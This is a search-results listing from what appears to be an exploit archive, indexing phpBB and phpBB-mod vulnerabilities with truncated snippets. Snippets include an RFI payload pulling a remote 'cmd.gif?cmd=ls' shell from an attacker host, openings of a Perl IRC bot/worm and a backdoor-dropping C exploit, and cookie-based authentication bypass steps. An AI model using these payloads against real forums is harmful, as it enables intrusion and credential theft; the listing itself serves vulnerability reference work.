2176 matches found
PHPBB 1.x/2.0.x Search.PHP Search_Results Parameter SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/9883/info A vulnerability has been reported to exist in the software that may allow a remote user to inject malicious SQL syntax into database queries. The problem reportedly exists in one of the parameters of the...
phpBB Shadow Premod <= 2.7.1 - Remote File Include Vulnerability
No description provided by source...
phpBB 2.0.21 Privmsg.PHP HTML Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/22001/info phpBB is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. Attacker-supplied HTML and script code...
phpBB News Defilante Horizontale <= 4.1.1 - Remote Include Exploit
No description provided by source...
phpBB <= 2.0.12 Session Handling Authentication Bypass (tutorial)
No description provided by source. 1. Register at forum? 2. Log in with account + UNCHECK Log in automatically 3. Close browser to be sure a cookie is made. 4. Locate cookie firefox: X:\Documents and Settings\Name\Application Data\Mozilla\Firefox\Profiles\profile.default\cookies.txt -- search the...
JASmine <= 0.0.2 (index.php) Remote File Include Vulnerability
No description provided by source. !/usr/bin/env python coding: utf-8 import re from pocsuite.net import req from pocsuite.poc import Output, POCBase from pocsuite.utils import register class JASmineNewsRemoteFileIncludePOCBase: vulID = '64073' version = '1' vulDate = '2006-10-17' author = ' '...
phpBB viewtopic.php Arbitrary Code Execution
No description provided by source. $Id: phpbbhighlight.rb 9671 2010-07-03 06:21:31Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of...
phpBB <= 2.0.13 'Calendar Pro' mod Remote Exploit
No description provided by source. !/usr/bin/perl -w use IO::Socket; Example: C:\calphpbb.pl www.site.com /phpBB2/ 2 'Calendar Pro' Mod for phpBB Connecting... + Connected! Sending Data... Data Sent, Waiting for response... + MD5 Hash for user with id=2 is: 81dc9bdb52d04dc20036dbd8313ed055 if @AR...
phpBB 2.0.x Profile.PHP SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/8994/info A SQL injection vulnerability has been reported for phpBB systems. phpBB, in some cases, does not sufficiently sanitize user-supplied input, which is used when constructing SQL queries to execute on the underlyi...
Auction <= 1.3m (phpbb_root_path) Remote File Include Exploit
No description provided by source...
phpBB <= 2.0.10 Bot Install (Altavista) (ssh.D.Worm)
No description provided by source. !/usr/bin/perl ------------------------------------------------------------------------ Severino Honorato - /server irc.priv8crew.info Priv8crew - ssh.D.Worm use IO::Socket; use LWP::Simple; my $processo = /usr/local/apache/bin/httpd -DSSL; $SIGINT = IGNORE;...
phpBB Journals System Mod 1.0.2 [RC2] Remote File Include Exploit
No description provided by source. !/usr/bin/perl Journals System Independant Journals System for phpBB Class: Remote File Include Vulnerability Patch: unavailable Date: 2006/10/12 Remote: Yes Type: high Site: http://projects.nbishop.name/phpbb/files/journalssystem1.0.2.zip...
PHPBB 2.0.x Admin_cash.PHP Remote PHP File Include Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/11701/info A vulnerability is reported to exist in the phpBB CashMod module that may allow an attacker to include malicious PHP files containing arbitrary code to be executed on a vulnerable system. Remote attackers could...
phpBB 1.0.0 & 2.0.10 - admin_cash.php Remote Exploit
No description provided by source. / exploit for phpBB 1.0.0 - 2.0.10 edit the b4b0.php file with the correct url to your backdoor and the correct filename for your backdoor upload it to a webserver. gcc -o b4b0-phpbb b4b0-phpbb.c ./b4b0-phpbb urltosystem phpbbdir urltob4b0.php telnet...
phpBB XS <= 0.58a (phpbb_root_path) Remote File Include Vulnerability
No description provided by source. phpBB XS = 0.58 phpbbrootpath Remote File Include Vulnerability2 Author: XORON - SHiKaA URL: http://www.comscripts.com/jump.php?action=script&id=1082 Class: Remote Code: include$phpbbrootpath . 'language/lang' . $boardconfig'defaultlang' . '/langbbcbmg.' . $phpE...
Knowledge Base Mod <= 2.0.2 (phpBB) Remote Inclusion Vulnerability
No description provided by source. Title: Knowledge Base Mod for PHPbb = 2.0.2 remote file inclusion URL: http://www.phpbb2.de/dload.php?action=file&fileid=538 Dork: Powered by Knowledge Base Credits: Oo Exploit: /includes/kbconstants.php?modulerootpath=http://yourhost/cmd.gif?cmd=ls milw0rm.com...
phpBB Static Topics <= 1.0 [phpbb_root_path] File Include Vulnerability
No description provided by source. --------------------------------------------------------------------------- phpBB Static Topics = 1.0 phpbbrootpath Remote File Include Vulnerability --------------------------------------------------------------------------- Discovered By Kw3RLn Romanian Securi...
phpbb-auction 1.x auction_room.php ar Parameter SQL Injection
No description provided by source. source: http://www.securityfocus.com/bid/19179/info PHPBB-Auction is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. These vulnerabilities could permit remote...
phpbb-auction 1.x auction_store.php u Parameter SQL Injection
No description provided by source. source: http://www.securityfocus.com/bid/19179/info PHPBB-Auction is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. These vulnerabilities could permit remote...
PHPBB MOD [2.0.19] Invitation Only (PassCode Bypass vulnerability)
No description provided by source. PHPBB MOD 2.0.19 Invitation Only PassCode Bypass vulnerability ------------------------------------------------------------------------------- 0 | | | | | | TM 1 | | | | | | 0 | / | ' \ / | ' \ / |/ | |/ / \ '| ' \ / \ | 1 / / | | | | / | | | | | | | / | | | | |...